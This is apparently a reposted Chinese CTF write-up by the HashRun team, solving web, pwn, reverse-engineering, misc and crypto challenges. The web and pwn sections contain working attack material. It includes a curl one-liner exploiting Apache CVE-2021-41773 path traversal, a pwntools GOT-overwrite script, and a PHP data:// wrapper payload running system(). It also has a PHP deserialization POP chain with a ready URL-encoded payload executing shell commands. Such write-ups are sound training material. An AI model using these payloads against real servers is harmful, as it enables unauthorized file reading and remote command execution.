HashRun安全团队wp

admin 2023年2月3日10:32:55评论74 views字数 5938阅读19分47秒阅读模式

web1

考点:cve-2021-41773

涉及工具:curl.exe

一行命令

参考文章:https://blog.csdn.net/weixin_45260839/article/details/125113167

Bash
curl.exe -v --path-as-is http://自己题目地址/icons/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/flag


HashRun安全团队wp

pwn1

检查代码,发现初始化了5个内存块

HashRun安全团队wp

其中400aa0是

HashRun安全团队wp

然后询问了名字

HashRun安全团队wp

并在下面puts输出了

HashRun安全团队wp

可得大致思路为魔改puts@got为system地址

然后询问了代码段和栈

HashRun安全团队wp

HashRun安全团队wp

HashRun安全团队wp

然后进入0x401040执行代码段

HashRun安全团队wp

发现为虚拟机,在搜索时意外发现原型ciscn_2019_qual_virtual,照其思路即可解决、

exp:

Python
from pwn import *

context.terminal = ['konsole', '-e']

#p = process("your_cpt")
p = remote("ip", "端口")
elf = ELF("./your_cpt")
puts_got = elf.got['puts']

p.recvuntil("name?n")
p.sendline("/bin/sh")

p.recvuntil("Code:n")
p.sendline(b"push push load push sub div load push add push push load push sub div save")

p.recvuntil("Stack:n")
p.sendline("8 -4 " + str(puts_got + 8) + " " + str(-0x2a300) + " 8 -5 " + str(puts_got + 8))

p.interactive()


re1

ida打开,很容易发现是go写的。。

但是。。咋跑都跑不起来。。

于是,静态,看不咋懂。。

但是根据函数名字,可以确定监听端口并收发数据。。

但是这协议。。没见过啊,只知道是基于tcp的。。

上网一找,发现是modbus协议。。

找到了库,应该就不难了。。可是不能动调。。

打开疑似加密函数,发现expand 32-byte k字符串。。。

好像似曾相识。。一查发现是chacha20算法。。

解密下,幸运地得到乱序的flag.

再猜下乱序算法,发现flag每两位交换可以让flag”看过去变正常”。。

然后提交。。居然过了。。。

函数列表:

HashRun安全团队wp

HashRun安全团队wp

HashRun安全团队wp

HashRun安全团队wp

exp:

      #! /usr/bin/python3# by [email protected] at Thu May 24 18:44:15 CEST 2018
"""Pure Python 3 implementation of the ChaCha20 stream cipher.
It works with Python 3.5 (and probably also earler Python 3.x).
Based on https://gist.github.com/cathalgarvey/0ce7dbae2aa9e3984adcBased on Numpy implementation: https://gist.github.com/chiiph/6855750Based on http://cr.yp.to/chacha.html
More info about ChaCha20: https://en.wikipedia.org/wiki/Salsa20"""
import struct

def yield_chacha20_xor_stream(key, iv, position=0): """Generate the xor stream with the ChaCha20 cipher.""" if not isinstance(position, int): raise TypeError if position & ~0xffffffff: raise ValueError('Position is not uint32.') if not isinstance(key, bytes): raise TypeError if not isinstance(iv, bytes): raise TypeError if len(key) != 32: raise ValueError if len(iv) != 8: raise ValueError
def rotate(v, c): return ((v << c) & 0xffffffff) | v >> (32 - c)
def quarter_round(x, a, b, c, d): x[a] = (x[a] + x[b]) & 0xffffffff x[d] = rotate(x[d] ^ x[a], 16) x[c] = (x[c] + x[d]) & 0xffffffff x[b] = rotate(x[b] ^ x[c], 12) x[a] = (x[a] + x[b]) & 0xffffffff x[d] = rotate(x[d] ^ x[a], 8) x[c] = (x[c] + x[d]) & 0xffffffff x[b] = rotate(x[b] ^ x[c], 7)
ctx = [0] * 16 ctx[:4] = (1634760805, 857760878, 2036477234, 1797285236) ctx[4 : 12] = struct.unpack('<8L', key) ctx[12] = ctx[13] = position ctx[14 : 16] = struct.unpack('<LL', iv) while 1: x = list(ctx) for i in range(10): quarter_round(x, 0, 4, 8, 12) quarter_round(x, 1, 5, 9, 13) quarter_round(x, 2, 6, 10, 14) quarter_round(x, 3, 7, 11, 15) quarter_round(x, 0, 5, 10, 15) quarter_round(x, 1, 6, 11, 12) quarter_round(x, 2, 7, 8, 13) quarter_round(x, 3, 4, 9, 14) for c in struct.pack('<16L', *( (x[i] + ctx[i]) & 0xffffffff for i in range(16))): yield c ctx[12] = (ctx[12] + 1) & 0xffffffff if ctx[12] == 0: ctx[13] = (ctx[13] + 1) & 0xffffffff

def chacha20_encrypt(data, key, iv=None, position=0): """Encrypt (or decrypt) with the ChaCha20 cipher.""" if not isinstance(data, bytes): raise TypeError iv=b'x03x01x02x04x03x05x01x02' if isinstance(key, bytes): if not key: raise ValueError('Key is empty.') if len(key) < 32: # TODO(pts): Do key derivation with PBKDF2 or something similar. key = (key * (32 // len(key) + 1))[:32] if len(key) > 32: raise ValueError('Key too long.')
return bytes(a ^ b for a, b in zip(data, yield_chacha20_xor_stream(key, iv, position)))plaintext =bytes([0x9F,0x29,0x32,0x8A,0x0C3,0x70,0x0BC,0x0EA,0x20,0x40,0x0F1,0x17,0x69,0x0E8,0x0FD,0x40,0x3,0x0E6,0x0A3,0x97,0x0B7,0x1E,0x0D3,0x0BF,0x24,0x83,0x32,0x0AB,0x79,0x28,0x25,0x37])key = bytes([0xC,0x17,0x22,0x17,0x2B,0x36,0x4C,0x2D,0x21,0x36,0x41,0x17,0x2D,0x17,0x41,0x20,0x0C,0x36,0x17,0x41,0x56,0x19,0x2D,0x4B,0x4A,0x17,0x40,0x55,0x18,0x2E,0x4C,0x22])flag=bytearray(chacha20_encrypt(plaintext,key))for i in range(0,32,2): l=flag[i] flag[i]=flag[i+1] flag[i+1]=lprint(flag)

flag{1849fe0d625382a75c93041a1c}



web2

f12 base64二次解码

访问解开的地址

使用data协议梭哈

因为有过滤所以base64加密协议后的内容

比如base64

就可以打出来

ps:可能是层级关系,所以file=data&content=base64 简写

可以打,而且非预期

exp:

PHP
/cream.php?file=data://,&content=data://text/plain;base64,PD9waHAgc3lzdGVtKCJjYXQgL2ZsYWciKTs/Pg==


misc3

HashRun安全团队wp

HashRun安全团队wp

HashRun安全团队wp

HashRun安全团队wp

Misc1

下载附件

base64解密

保存为png 查看16进制码

发现两两之间颠倒 脚本:

Python

f=open("./MISC1.png","rb")
f2=open("./OUTPUT.png","wb")
data1=f.read()

for i1 in range(0,len(data1),2):
    for i2 in [1,0]:
        try:
            W=chr(data1[i1+i2]).encode("iso8859-1")
            f2.write(W)
        except:pass
f2.close()

(wp 别直接写上啊

然后解出来原图

lsb带密钥 万能和xian

web3

打开题目链接

扫目录发现文件备份www.zip

下载发现两个文件,demo.php和index.php第二个文件没东西

发现demo.php中存在反序列化漏洞

绕过点:参数值中不能带有O所以我们就使用arry绕过

这里注意下wakeup,这里存在字符串比较经典的!=这里可以直接跳转到toString方法,exp如下:

题目还有个小坑:题目php版本是5.5记得要把方块转化成%00,是由于protected导致,跑exp用php5.5

Sliver::_wakeup=>Range::toString=>Water::get=>Circle::_invoke=>::runc

Exp:

PHP


class Water{
    public $waterfall;
}

class Circle{
    public $daemon;
    public $dash;
    public function __construct(){
        $this->dash = "system('nl+/*');";

    }
}

class Range{
    public $horis;
    public $link;
}

class Sliver{
    public $secret;
    public $resty;
}

$w = new Water();
$c = new Circle();
$r = new Range();
$s = new Sliver();

$w->waterfall = $c;
$r->link = $w;
$s->secert = $r;
$a = array("1",$s);
$final = serialize($a);
echo urlencode($final);

Pop:

Bash
a%3A2%3A%7Bi%3A0%3Bs%3A1%3A%221%22%3Bi%3A1%3BO%3A6%3A%22Sliver%22%3A2%3A%7Bs%3A6%3A%22secret%22%3BO%3A5%3A%22Range%22%3A2%3A%7Bs%3A5%3A%22horis%22%3Bs%3A16%3A%22system%28%27nl+%2F%2A%27%29%3B%22%3Bs%3A4%3A%22link%22%3BO%3A5%3A%22Water%22%3A1%3A%7Bs%3A9%3A%22waterfall%22%3BO%3A6%3A%22Circle%22%3A2%3A%7Bs%3A6%3A%22daemon%22%3BN%3Bs%3A7%3A%22%00%2A%00dash%22%3Bs%3A16%3A%22system%28%27nl+%2F%2A%27%29%3B%22%3B%7D%7D%7Ds%3A5%3A%22resty%22%3BN%3B%7D

cry1

猜测是摩斯密码,在文本里替换A变成“-”,B变成“.”,换行变成空格。

将得到的拿去摩斯密码在线解密,得到一串

Plaintext
mdbrhxsgvkxwxcfsggdfspscxvgptfgpds.bkjogdtkfoejfwvdowfjvfhfadkkdwxpsmptpgfwkptegvhfsftxhxsgfsmbdojkptegpsikpstxhxsgmpvorgxvpskxtfkmgdmptpgfwhxmpf.gexiwftpv1m817i23-4x20-9405-qi6m-x83m055316m6,owxfvxfmmiwftvgkpstfsmqkfbxvjdrkvxwi,fsmfwwwxggxkvfkxwdnxkbfvx.

然后将得到的拿去quipquip上在解密,得到

SQL
documents relevant to an investigation cryptography also plays a major role in digital rights management and copyright infringement disputes in regard to digital media the flag is d feb f de d d please add flag string and braces yourself and all letters are lower case

翻译之后大概猜出是要替换掉之前的那串数据。

原和后替换后得到

Plain Text
1d817f23-4e20-9405-bf6d-e83d055316d6

最终flag就是  flag{1d817f23-4e20-9405-bf6d-e83d055316d6}


原文始发于微信公众号(HashRun安全团队):HashRun安全团队wp

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年2月3日10:32:55
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   HashRun安全团队wphttps://cn-sec.com/archives/1291271.html

发表评论

匿名网友 填写信息